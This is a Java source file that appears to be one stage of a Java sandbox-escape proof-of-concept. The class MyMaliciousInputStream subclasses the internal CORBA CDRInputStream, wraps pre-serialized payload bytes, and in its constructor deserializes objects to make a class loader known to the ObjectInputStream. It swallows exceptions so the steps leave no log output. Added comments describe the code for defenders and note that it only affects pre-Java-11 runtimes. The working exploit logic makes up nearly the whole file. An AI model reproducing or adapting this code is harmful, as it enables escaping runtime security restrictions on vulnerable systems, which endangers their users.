twostage/src-exploit/x/MyMaliciousInputStream.java
package x;
import java.io.InputStream;
import java.nio.ByteBuffer;
import com.sun.corba.se.impl.encoding.CDRInputStream;
import com.sun.corba.se.impl.encoding.CodeSetConversion.BTCConverter;
import com.sun.corba.se.spi.ior.iiop.GIOPVersion;
/**
 * Subclass of the JDK-internal {@code com.sun.corba.se.impl.encoding.CDRInputStream}
 * that wraps a fixed buffer built from {@code CorbaTrustedMethodChain.serializedBytes}
 * and, in its constructor, drives {@code read_long()} / {@code read_value()} over it.
 * The file path ({@code src-exploit}) and the class name mark it as part of a
 * proof-of-concept; the author's inline comments say the reads exist to get a class
 * loader "known to the ObjectInputStream".
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>The class compiles only against the internal {@code com.sun.corba.se.impl} and
 *       {@code com.sun.corba.se.spi} packages. The CORBA modules were removed from the
 *       JDK in Java 11 (JEP 320), so this code is only relevant to older runtimes.</li>
 *   <li>Application or applet code that extends or instantiates classes from these
 *       internal packages is unusual and worth flagging in code review or class-load
 *       monitoring.</li>
 *   <li>Both {@code read_value()} calls swallow every exception, so these steps leave
 *       no stack trace or log output.</li>
 * </ul>
 */
public class MyMaliciousInputStream extends CDRInputStream {
// NOTE(review): whether CDRInputStream is Serializable is not visible in this file;
// the field is only meaningful if it is.
private static final long serialVersionUID = 889128311636547341L;
/**
 * Builds the buffer handed to the superclass constructor: a 100000-byte array with
 * {@code CorbaTrustedMethodChain.serializedBytes} copied in at offset 16, leaving the
 * first 16 bytes zero.
 *
 * <p>Any exception from the copy (for example a payload longer than 100000 - 16 bytes,
 * or a null source array) is printed and otherwise ignored; the array is still wrapped
 * and returned.
 *
 * @return a {@link ByteBuffer} wrapping the 100000-byte array
 */
static ByteBuffer createBuffer() {
// Earlier variant, left disabled by the author: it read the same bytes from the
// classpath resource /x/bytes.ser into the array at the same offset (16).
// InputStream in = XAppletW.class.getResourceAsStream("/x/bytes.ser");
// byte[] bytes = new byte[100000];
// try {
// in.read(bytes,16,100000-16);
// } catch (Exception e) {
// e.printStackTrace();
// }
byte[] bytes = new byte[100000];
try {
System.arraycopy(CorbaTrustedMethodChain.serializedBytes, 0, bytes, 16, CorbaTrustedMethodChain.serializedBytes.length);
} catch (Exception e) {
// Failure is only reported on stderr; the caller cannot tell that the copy failed.
e.printStackTrace();
}
return ByteBuffer.wrap(bytes);
}
/**
 * Creates the stream over {@link #createBuffer()} with a fresh {@code MyORB} and
 * GIOP version 1.2, then immediately performs four {@code read_long()} calls and two
 * {@code read_value()} calls whose exceptions are discarded.
 *
 * <p>All work happens as a side effect of construction; the results of the reads
 * are not stored.
 */
public MyMaliciousInputStream() {
// NOTE(review): the literal 10000 differs from the 100000-byte array allocated in
// createBuffer(). The meaning of this and the remaining arguments is defined by the
// CDRInputStream constructor, which is not visible here. Presumably it is a size; confirm.
super(new MyORB(), createBuffer(), 10000, true, GIOPVersion.V1_2, (byte) 1, null);
// Presumably these four reads consume the 16 zero bytes that precede the payload
// (4 x 4-byte CORBA long); confirm against CDRInputStream.
read_long(); // To init ObjectInputStream
read_long(); // "
read_long(); // "
read_long(); // "
// This is a hack to make sure we have the user classloader
// on the stack for the first object we load.
try {
read_value(); // Read SerializableClassLoader and fail
} catch( Exception e ) {
// Yes, we fail!
// The failure is expected by the author and deliberately ignored.
}
try {
read_value(); // Read ClassLoaderHolder which makes it known
// to the ObjectInputStream.
} catch( Exception e ) {
// Yes, we fail!
// Ignored for the same reason as above; nothing is logged.
}
}
/**
 * Stub override that always returns {@code null}; no wide-character converter is
 * provided by this subclass.
 */
@Override
protected BTCConverter createWCharBTCConverter() {
return null;
}
/**
 * Stub override that always returns {@code null} instead of a duplicate stream.
 * The body is an unfinished IDE-generated placeholder.
 */
@Override
public CDRInputStream dup() {
// TODO Auto-generated method stub
return null;
}
}